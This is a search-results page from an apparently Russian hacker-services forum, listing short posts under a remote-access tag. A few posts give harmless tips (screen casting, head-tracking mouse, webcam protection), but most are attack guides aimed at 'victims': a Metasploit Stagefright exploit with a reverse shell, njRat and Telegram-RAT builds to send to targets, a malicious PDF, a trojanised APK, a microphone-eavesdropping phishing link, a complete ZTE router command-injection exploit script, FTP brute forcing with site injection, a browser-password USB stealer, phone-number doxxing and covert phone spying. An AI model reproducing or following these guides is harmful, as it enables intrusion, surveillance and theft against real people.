Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'удаленный доступ'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 21 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете транслировать экран компьютера на любое устройство. Deskreen — бесплатная программа, которая позволяет превратить любое устройство с дисплеем, Wi-Fi и браузером во второй монитор для компьютера. Вы можете расширить рабочий стол, дублировать его или вывести по одному запущенному приложению на каждый девайс. Изображение передаётся через браузер, так что нужно установить программу только на один компьютер. Для того, чтобы начать транслировать свой экран нужно: Включить программу, подключитесь на компьютере и другом устройстве к одному и тому же Wi-fi. Отсканируйте QR код или введите указанный адрес в браузере вашего устройства. Нажмите "Разрешить", выберите что хотите транслировать и нажмите "Подтвердить". Готово, теперь изображение должно показываться на вашем втором устройстве. Также можно подключить сразу несколько устройств и транслировать разные окна приложений. Поэтому это отличный вариант как для личного пользования, так и для проведения различных мероприятий. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том , как вы можете управлять компьютером без рук. Довольно специфичная задача – управлять компьютером без помощи рук. Тем не менее она может быть иногда нужна. Для этого можно воспользоваться утилитой Viacam. Возможности голосового управления есть во многих операционных системах. Очень часто они не столь полезны. Несколько задач голосовым управлением можно сделать, но до полноценного управления компьютером – очень далеко. Viacam идет немного иным путем. Отслеживая вашу голову и лицо при помощи веб камеры, алгоритмы программы позволят управлять курсором. Управление станет аналогичным, если вы используете мышь. По сути, при помощи программы можно полноценно управлять компьютером. Viacam работает с Windows и Linux. Поэтому можете попробовать данную программу, немного ознакомится с его функционалом и посмотреть, как это все работает. Возможно, что какие-то из предоставленных функций могут быть полезны кому-нибудь из вас и смогут облегчить работу за компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством. Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий. Приступим: 1. Первым делом устанавливаем нашу утилиту в Termux: update apt upgrade pkg install unstable-repo pkg install Metasploit 2. После этого запускаем утилиту: 3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда →ТЫК← и перекидываем в папку с эксплоитами. 4. После этого прописываем: msfconsole — открытие консоли use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита set SRVHOST вашIP URIPATH / set PAYLOAD linux/armle/mettle/reversetcp set LHOST вашIP set VERBOSE true exploit -j — запуск эксплоита Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я расскажу вам о том, как заблокировать доступ к микрофону смартфона. Прямо сейчас и во время звонков другие приложения могут прослушивать вас, ведь когда-то вы дали им доступ к микрофону телефона. Чтобы навсегда избавиться от прослушки, есть полезное приложение — Micro Guard FREE для Android. Оно надёжно блокирует микрофон, чтобы никакие приложения не получили к нему доступ. В отличие от альтернатив, блокировщик защищает даже от шпионского ПО и требует минимального количества разрешений, поэтому это будет лучшим выбором среди подобных приложений. Чтобы воспользоваться этим методом, необходимо: Скачать приложение из Google Play. Открыть, передвинуть ползунок в режим «ON» и нажать на «Поиск шпионских программ». Затем нажать на «Устранить все проблемы». Разрешить включить функцию «Deep detective». Она поможет фиксировать попытки получить доступ к микрофону без вашего ведома. На iOS есть хорошая альтернатива — McAfee Mobile Security. Помимо других фич, там также есть блокировка микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как можно установить слежку за человеком с помощью ссылки. Trape – OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени. Trape создает фишинг ссылку, и через нее следит за пользователем. Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС. Также вы сможете запускать удаленно js скрипты, загружать файлы на пк. Можно будет узнать на каких сервисах зарегестрирован пользователь. Установка: $ apt update -y $ apt upgrade -y $ apt install python $ apt install git $ git clone https://github.com/jofpin/trape.git Запуск: $ cd trape $ pip3 install -r requirements.txt $ python3 trape.py --url --port 8080 Запуск(Пример): $ python3 trape.py --url http://example.com --port 8080 Мы получим следующее: 1. Фишинг ссылку. 2. Ссылку на админ панель. 3. Пароль для входа в админ панель Отличная программа для установки базовой слежки за человеком, не требует никаких специфических навыков. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об интересной подборке сервисов, которые позволяют узнать нам достаточно приличный объём информации о пользователе, имея на руках только номер его сотового телефона. Сервисы: 1. Lampyre (https://lampyre.io/) - веб-версия поиска по аккаунтам и телефонной книге. 2. Getcontact (https://www.getcontact.com/ru/) - поиск информации о том, как записан номер в контактах. 3. Avinfo Guru (https://avtobot.net/avinfo-guru-prilozhenie) - пробиваем владельца авто по телефону. 4. Telefon Stop-list (http://telefon.stop-list.info/) - поиск номера по всем ресурсам. 5. Rosfirm (https://www.rosfirm.ru/) - поиск ФИО, прописки, адреса. Но нужно знать город. 6. Spravnik (https://spravnik.com/) - поиск по городскому номеру, находит ФИО и адрес. Все эти сервисы могу быть для вас очень полезными. Ведь эти сервисы – самый быстрый способ пробива практически любого номере телефона. Поэтому, пользуйтесь, пока возможно, никаких особенных навыков для этого не нужно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! Инструмент удаленного администрирования (RAT) – это запрограммированный инструмент, который позволяет удаленному устройству управлять системой, как если бы у него был физический доступ к этой системе. В то время как совместное использование рабочего стола и удаленное администрирование имеют много законных применений, программное обеспечение «RAT» обычно связано с несанкционированной или злонамеренной деятельностью. NjRat – одна из лучших RAT. Это позволяет получить доступ к удаленному компьютеру и легко выполнять любые удаленные задачи. В этом уроке я расскажу вам, как удаленно взломать компьютер с помощью njRat. КАК УДАЛЕННО ВЗЛОМАТЬ КОМПЬЮТЕР С NJRAT? ТРЕБОВАНИЯ: njRat (инструмент удаленного администрирования).Динамический IP / хост.DUC (Клиент Noip.com)Открытый порт.ШАГИ: 1) Загрузите njRat v0.8 как обновленную версию. Вы также можете работать с любой старой версией, если хотите. 2) Зайдите на сайт noip.com и зарегистрируйтесь. После регистрации вы увидите поле, как показано ниже, для ввода имени хоста. Введите любое имя, выберите любой tld из выпадающего меню и нажмите кнопку «Добавить хост». 3) Хорошо. Давайте откроем njRat и начнем строить сервер. Когда вы откроете окно, появится всплывающее окно, как показано на скриншоте ниже. Пожалуйста, введите порт, который хотите использовать. Я бы рекомендовал порт по умолчанию 1605. Введите 1605 и нажмите кнопку ОК. 4) После нажатия Ok нажмите кнопку Build. И заполните все поля, как я сделал на скриншоте. Убедитесь, что вы ввели собственное имя хоста в поле хоста. Введите порт 1605. В имени жертвы вы можете указать любое имя, какое захотите. Размер KeyLogs подходит для 20. Выбирает каталог, в котором вы хотите разместить свой сервер. И дайте ему имя exe. Вы также можете использовать значок, отметив значок. Но пока я не буду им пользоваться. 5) Когда вы нажмете кнопку «Создать», вам будет предложено ввести имя, указать любое имя и нажать «Сохранить». Начнется создание сервера. Вы увидите диалоговое окно успеха. Теперь сервер готов к распространению на другие компьютеры. Вы можете отправить его кому-нибудь через онлайн-файлы или любым физическим способом. Обязательно заархивируйте его перед копированием на любой физический носитель. 6) Теперь нам нужно открыть порты. Это немного сложная часть. Для этого я создал и разместил видеоурок. 7) Загрузите DUC и введите свое имя пользователя и пароль на noip.com. 8) Все готово … Теперь мы в порядке. Когда кто-то откроет созданный нами сервер на своей машине, он окажется у нас в руках и появится в окне njRat. Вы можете выполнять на компьютере жертвы любое действие, какое захотите. Вот и все .. Надеюсь, вы научились удаленно взламывать компьютер с помощью njRat. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! Как известно, даже если у вас паранойя — это не значит, что за вами не следят. Сегодня, когда за вами совершенно точно следят, эта фраза особенно актуальна — крупные компании давно мониторят ваши действия в сети, кибермошенники приглядываются к счету в банке, а нейросети научились успешно распознавать лица и находить по фото ваш профиль ВКонтакте. Чтобы сохранить приватность хотя бы дома, рекомендуем наше руководство по защите веб-камеры от взлома: Как защитить веб-камеру от взлома: Установите надежный антивирус, своевременно его обновляйте и не отключайте ни при каких условиях; используйте файерволОбновляйте операционную систему, браузер, основные приложения и драйвера веб-камер на ваших устройствах; погуглите возможные уязвимости конкретной моделиНе подключайтесь к незапароленным Wi-Fi-сетям; игнорируйте сообщения и письма от незнакомых отправителей, особенно если они содержат подозрительные ссылки и вложенные файлыСкачивайте бесплатные программы только с сайта производителяУстановите сложный пароль на все устройства с камерами и доступом в интернет, в том числе на радио-няню и камеру видеонаблюденияВсегда изменяйте заводские настройки безопасности на всех устройствах (компьютер, ноутбук, смартфон, планшет, веб-камера, роутер и т. д.)Обращайте внимание на индикаторы работы веб-камеры и проверяйте ее настройки, если она включается не только во время видеозвонковЕсли вы считаете себя продвинутым пользователем, отключите веб-камеру аппаратно.Как бы смешно это ни звучало, самым действенным способом защиты веб-камеры остается скотч или изолента Однако помните, что если злоумышленник уже получил доступ к ПК, то он все еще может записать звук с микрофона ноутбука или похитить другую важную информацию. Поэтому главной защитой остаются антивирус, бдительность и критическое мышление. Ряд дополнительных рекомендаций: Представьте, что световой индикатор камеры на секунду загорается и тут же гаснет. Это может быть тревожным звонком, игнорировать который нельзя (если вы не хотите, чтобы ваша личная жизнь вдруг стала общественной). Но даже если индикатор не горит, веб-камера все еще может тайно работать. Узнать, какие программы используют камеру, довольно просто. 1.Прежде всего, вам понадобится специальный софт, который покажет все процессы, связанные с тем или иным устройством. Для этой цели предлагаем воспользоваться Process Explorer. Эта удобная программа доступна в онлайн- и оффлайн-режимах. 2. Затем вам нужно узнать название веб-камеры в системе (в русскоязычных версиях Windows это звучит как «Имя объекта физического устройства»). Найти эту информацию нетрудно: Пуск — Панель управления — Оборудование и звук — Диспетчер устройств. 3. Далее «Устройства обработки изображений» — «Свойства» камеры — вкладка «Сведения». В выпадающем списке выбираем «Имя объекта физического устройства», которое выглядит примерно так: «\Device\0000009c». Щелкните по нему правой кнопкой мыши и нажмите «Копировать». 4. Теперь заходим в Process Explorer, открываем поиск по кнопке с иконкой бинокля (или сочетанием Ctrl + F), вставляем «Имя объекта физического устройства» и запускаем поиск, чтобы найти все процессы, использующие вашу веб-камеру. Если никакой подозрительной активности не обнаружилось, беспокоиться не о чем. Обычно в этом списке вы найдете только Skype или другие приложения для видеозвонков. Однако не поленитесь проверить путь запуска. Злоумышленники часто пытаются выдать вредоносную программу за легитимное приложение, пользуясь невнимательностью обычных пользователей. Если же вы видите в списке Process Explorer подозрительные несистемные программы, которые вы точно не устанавливали, рекомендуем закрыть этот процесс и выполнить полное антивирусное сканирование. P. S. Описанный выше способ можно применять и к микрофонам, которые также могут стать целью для шпионских программ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  9. Приветствую хакеры, в данной статье мы разберемся, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux. Для начала обновляем пакеты: apt update && apt upgrade Устанавливаем все необходимые библиотеки для установки: apt install python3 python3-pip pip3 install pyinstaller pip3 install pytelegrambotapi opencv-python cryptography pip3 install comtypes pywin32 pyaudio pillow pycaw Клонируем инструмент с репозитория GitHub: git clone https://github.com/Bainky/Telegram-RAT Далее переходим в директорию инструмента: cd Telegram-RAT Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота. Осталось только скомпилировать данный файл и все готово: pyinstaller --onefile --noconsole RAT.py После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве. В том случае, если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram и сможем управлять им. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци.
  10. Сегодня поговорим о том, как имея в распоряжении один лишь компьютер с операционной системой Linux или смартфон с Termux’ом на борту, можно сделать полноценное прослушивающее устройство введя в консоли пару-тройку нехитрых команд. Внимание! Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия! Погнали! Инструкция Копируем с гитхаба скрипт sayhello: git clone https://github.com/Aaryan101/sayhello Переходим в соответствующий каталог: cd sayhello Выдаем разрешения: chmod +x sayhello.sh И запускаем скрипт для прослушки: bash sayhello.sh В появившемся окне указываем сервис для форварда (Ngrok 2), а затем выбираем куда будет вести редирект. По дефолту он отправляет жертву прямиком на ютубчик. Копируем сгенерированную ссылку. Далее включаем соображалку, думая под каким благовидным предлогом можно передать её жертве. В конце статьи я подкину вам идею. Если клиент на том конце разрешит доступ То в окне скрипта сразу забегают строки, оповещающие о сохранении файлов аудиозаписей. Прослушать их можно перейдя в каталог sayhello. Записи будут сохраняться до тех пор, пока вы не завершите работу скрипта нажав CTRL+C, либо не ребутните тачку. Жёсткий диск при этом забивается со скоростью света. Основная сложность этого метода заключается в том, как заставить жертву перейти по ссылке, да ещё и разрешить доступ к своему микрофону. Обычно хакеры используют для этого различные площадки с обучающими вебинарами. Т.е. падает вам на почту письмо, мол так и так мы такая-то академия или учебный центр, пройдите по ссылке для доступа к вебинару или онлайн-конференции. Естественно, при таком раскладе в голове обывателя не возникает сомнений в момент подтверждения доступа. Ведь в вебинаре нужно же как-то участвовать. Причём само мероприятие может быть вполне реальным. Вас редиректнут, вы зарегаетесь на фейковом сайте и всё вроде бы ОК. Однако в этот момент вы уже плотно попались на удочку и все ваши разговоры передаются прямиком хакеру. Поэтому будьте предельно бдительны, прежде чем переходить по каким-либо ссылкам. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Всем привет, сейчас расскажу вам о том, как с помощью apk-файла мы сможем получить доступ к устройству. Первым делом вам нужно скачать любой APK-файл, главное чтобы он весел менее 5 мегабайт, поэтому идем на такой сайт как 4PDA и находим какую-нибудь программу, лично я возьму программу, которая позволят скачивать музыку из соц. сетей. После выполнения данного пункта нам нужно перейти в терминал и прописать все это: -x – использование определенного файла -p – прикрепить payload -o – как-то назвать файл -e – зашифрока файла от антивируса -I – указания кол-ва слоев шифрования Нажимаем Ентер и ожидаем, либо у нас появится ошибка, либо файл будет скомпилирован. Если все-таки появилась ошибка, то нам необходимо обновить APKtool. Если и это не смогло вам помочь, то ищем другой apk-файл, который будете использовать для заражения. Теперь нам нужно использовать фишинг и навыки социальной инженерии для того, чтобы создать простую страницу для зараженной программы. Для создания страницы можно использовать различные конфигураторы сайтов, либо делать это по какому-то исходнику, его я прикрепляю. Не забывайте, что если будете использовать какой-либо конфигуратор, он добавит вам кучу не нужного мусора и хлама. Исходник - https://bit.ly/2k3hKP2 Пароль – social_engineering Помещаем зараженный APK-файл в папку Social, по адресу /var/www/html/ Если картинка не отображается, то вам нужно дать доступ юзеру для чтения и записи в www. Теперь нам необходимо открыть index.html с помощью любого редактора текста и поменять все необходимые вам надписи. После запуска нам нужно открыть бразуер и ввести там свой IP-адрес. Что ваш айпишник стал выглядеть как ссылка для сайта, вам нужно будет установить кое-какую программу, ее найти можно на GitHub, называется она – Cuteit Все расписывать я не буду, в программе есть руководство, которого будет достаточно для нашей задачи. Берем понравившуюся ссылку, копирую ее и вставляем в браузер. Вуаля, мы попали на собственный сервер. Однако в строке сразу же палится ваш IP-адрес, его мы уберем с помощью Ngrok. Скачиваем его, после чего проходим регистрацию и выполняем все действия из руководства, главное быть точным, иначе ничего не сработает. Когда вы закончить все это дело, нам нужно перейти в папку с этой программой, открыть терминал и вписать: Вот мы и получили ссылки, на этом все.
  13. Всем привет, сейчас я вам собираюсь показать, как можно очень быстро спрятать файл прямо в картинку формата jpg. Для этого нам нужно конечно найти картинку, в которой будем прятать файл. Чтобы вам было проще, просто переместите картинку на раб. стол и дайте ей название 123, после чего создаем архив на столе к примеру с названием 321. Что же у нас есть? 123.jpg – та самая картинка, в котором будет спрятан архив 321.rar – тот самый архив который мы будем прятать в картинке Теперь нам нужно открыть блокнот и ввести следующий код: copy /b 123.JPG + 321.rar 888.jpg Сохраняем это как 1.bat, после чего запускаем Итак, как же это понимать? JPG – это картинка Rar – это файл888.jpg – это уже созданная картинка с архивом внутри. После этого нам необходимо открыть картинку таким образом “открыть как…”, в открывшийся архив мы закидываем все что нам нужно. Теперь мы можем передавать кому-нибудь эту картинку, он в свою очередь сможет доставать из нее файлы. На этом можно закончить. На самом деле этот способ скрытия информации очень эффективен и полезен. Таким образом вы можете легко спрятать какие-то важные данные на вашем компьютере, вряд ли кто-то догадается открыть через архиватор картинку.
  14. Я хочу рассказать про уязвимость в ZTE роутерах, доступному по URI router_ip:443/web_shell_cmd.gch. Уязвимость заключается в том, что мы посылаем POST-запрос с ошибкой и ее типом, а в ней — код для выполнения. Информация предназначена исключительно для ознакомления. Не нарушайте законодательство. Поехали! import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') В этом участке кода мы загружаем необходимые модули для работы эксплойта. Также я сделал, чтобы цели брались из списка, подготовленного нами. В конце я покажу пример запуска эксплойта. И ещё на этом участее кода есть многопоточность. Далее в коде: def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return мы передаём переменной f1 — payload, отправляя POST-запрос на /web_shell_cmd.gch с ошибкой, где в типе ошибке уже содержится payload. Для примера я просто сделал команду, которая создаёт папку hacked. Далее идут SSL-сокеты, которые отправляют payload устройствам из списка. При успешной передаче команды роутеру ZTE выводится надпись Pwned + IP роутера. Слэшы и точки должны быть в hex формате, а пробелы — заменяться знаком +. Далее в коде идёт простая функция, которая просто запускает эксплуатацию роутеров: for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Пример запуска: python exploit.py zte Где zte — это список IP адресов роутеров ZTE. Тип записи IP роутеров ZTE в список: 192.168.1.1 192.168.1.2 192.168.1.3 Исходный код эксплойта: import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Эксплойт работает на python2.
  15. Всем привет, в этой статье речь снова пройдет про взлом, однако теперь взламывать мы будем сайты с помощью FTP. Рассказывать о конкретных ресурсах я не собираюсь, так как поиск жертвы лежит на ваших плечах. Безусловно, администраторы сайтов могут быть не такими глупыми и просто закрывают все порты, устанавливают сложные пароли на различные интерфейсы и так далее. Такой сайт взломать станет намного сложнее. Однако, никогда не стоит забывать, что абсолютной защиты не существует. Что-то созданное человеком, им же и взламывается, особенно если учитывать тот факт, что чаще всего администраторы не закрывают порты, не производят привязку по ИП и устанавливают ненадежные пароли. Также не производят обновление программного обеспечение. Этот факт является очень плохим для жертвы, а для нас очень хорошим. Первым делом сканирование портов. Существует множество программ, как автоматизированные сканеры, так и самописные скрипты, если говорить коротко, то их большое множество. Если вы обладаете большим мастерством в хакинге, то можете использовать Kali Linux со встроенными утилитами. Если немного отвлечься, то Kali Linux невероятная операционка, которая позволяет проводить огромное множество манипуляций для взлома. Чтобы сканировать порты я взял программу NMAP Итак, переходим в консоль и записываем следующее: Nmap –p 21 [ип жертвы] Если порт будет открыт, ты мы увидим вот это: По стандарту для подключения по FTP нужен логин и пароль, однако в некоторых случаях можно зайти и анонимно. Чтобы найти этот анонимный вход хакеру нужно воспользоваться metasploit: use auxiliary/scanner/ftp/anonymous set rhosts [ип жертвы] exploit Если в этих строках вы заметили слово READ то можете поздравить себя, так как это значит, что подключится к FTP можно без логина и пароля. Подключаемся к серверу Чтобы осуществить это вы можете использовать любую программу, просто записываем ИП адресс сайта жертву, порт 21 и любой произвольный логин с паролем. Если прошлые пункты прошли успешно, то все должно работать. Итак, а что если совершить анонимный вход невозможно? В таком случае мы опять обращаемся к metasploit и вводим следующий код: use auxiliary/scanner/ftp/ftp_login set rhosts [ip жертвы] set user_file /root/docs/user.txt set pass_file /root/docs/pass.txt set stop_on_success true exploit Да, вы все правильно поняли, мы будем брутить с помощью metasploit’а В текстовых документах user и pass будут сохранятся произвольный логины и пароли пользователей. Их легко найти целыми пачками в интернете, причем не вкладывая ни копейки. Поиски не затянутся, а найти можно паки с более 10 млн записей. Когда вы получили доступ к FTP вы сможете заполучить очень ценные БД, после чего слить их на специальных ресурсах или же вы можете внедрить какой-нибудь вирус. Не будем жестить, поэтому рассмотрим самые стандартные варианты: • Внедрение iframe с вашей партнерской программы размеров в 1 пиксель, за которые вы будете получать деньги. • В каком-либо HTML-файл на сайте установить перенаправление на необходимый вам ресурс. • Установка в какую-либо часть сайта скрипт, который будет запрашивать информацию пользователя. • Также огромное множество других вредоносных кодов. Это все что я хотел рассказать сегодня. Я не призываю никого к действиям, а лишь хочу обезопасить владельцев сайтов, показа как легко обходятся различные защиты.
  16. Всем привет, сегодня начать слежку за телефоном не так уж и сложно, из-за того, что система безопасности нынешних смартфонов не так высока и доступ в интернет есть практически у каждого. Чтобы начать следить за телефоном нам может помочь официальная программа от компании Гугл, которая будет обрабатывать данные вашего аккаунта. Данный инструмент работает только на платформе Андроид, а это значит, что абсолютно у каждого там имеется Гугл аккаунт. Как следить за телефоном через интернет? На сегодняшний день я могу выделить лишь две стабильные шпионские программы. А именно: WardenCam и приложение от гугл TrackView. Работают они по схожему принципу. Хочется уточнить, что первая программа имеет небольшое преимущество над второй, ведь данная программа позволит подключить аккаунт Dropbox и на него скачивать все видео со смартфона. Однако имеется и недостаток, ведь данная программа может не работать с некоторыми моделями телефонов. А вот официальная программа от гугл выглядит куда лучше, ведь у нее нет привязки к телефону, и она может подключаться к любым возможным устройствам. С помощью данного инструмента вы сможете не только вести видеозапись на телефона, но и получить полный контроль над смартфоном. А именно получать местонахождение телефона, доступ к галереи, а так же иметь доступ к микрофону. Конечно, по факту это будет является нарушением закона, однако, это можно использовать и для контроля собственного телефона. Допустим, у вас каким-либо образом украдут телефон, вы сразу же сможете найти его местоположение и выйти на преступника. Или же допустим следить за ребенком. А можно пойти другим путем и удобно расположить телефон в квартире и следить за ней. Как следить за человеком через телефон? Первым делом, как ни странно, нам нужно установить данную программу, сделать этому можно с Play Market. Данный инструмент должен быть установлен на тот смартфон, на который вы хотите получить повышенный контроль. Таким устройством может является любой телефон, который имеет при себе встроенную камеру. Данный инструмент можно найти даже для телефонов от Apple и Windows. Все это найти можно на сайте разработчика. Также, чтобы вести контроль нужно иметь одинаковые аккаунты для разных устройств, которые имеют учетные записи в Google. А самым главным фактором для слежки – это постоянный доступ к интернету. Для начала работы следует лишь скачать приложения, зайти в них под необходимым аккаунтом и добавить нужное устройство, после этого вы сможете пользоваться всеми функциями данной программы. Кроме вышеперечисленного вы сможете изменять фильтры сообщений, установить детекторы движения и прочие интересные вещи. Программа проста и легка в использовании, а это значит, что даже неопытный пользователь сможет без труда в ней разобраться. Однако никогда не забывайте, чтобы проводить слежку нужно чтобы оба устройства были активны и имели постоянный доступ в интернет.
  17. Привет всем, данная небольшая статейка будет очень полезна для тех, кто хочет сделать стиллер, да не простой стиллер а usb. Есть множество вариантов как это можно воплотить, однако я расскажу про один и он является самым быстрым. Итак, данный стиллер нам поможет воровать пароли а также логины к ним прямо из браузеров. Первым делом нам нужно подготовить все необходимое, а это – флешка с объемом не менее 2 гигабайт, однако советую брать с небольшим запасом. Далее нам нужно скачать программу под названием – WebBrowserPassVies Готово, теперь перекидываем эту прогу на нашу и флешку и после этого мы можем начать атаковать ничего не подозревающих жертв. Чтобы совершить взлом нам нужно вставить данный usb-накопить в компьютер и шустро набрать несколько комбинаций клавиш. Первой является Ctrl + A с помощью нее мы выделим всю необходимую для нас информацию Второй является Ctrl + S с помощью нее мы сохраним все эти данные под любым названием, которое вы захотите. Как только это все сделано вы можете вынимать накопить и покидать место вашей атаки. Этот метод является далеко не самым новым, ведь как я уже говорил ранее – есть огромное множество для создания usb-стиллеров. Но этот метод все еще держится на плаву и является весьма эффективным и требует минимум сил.
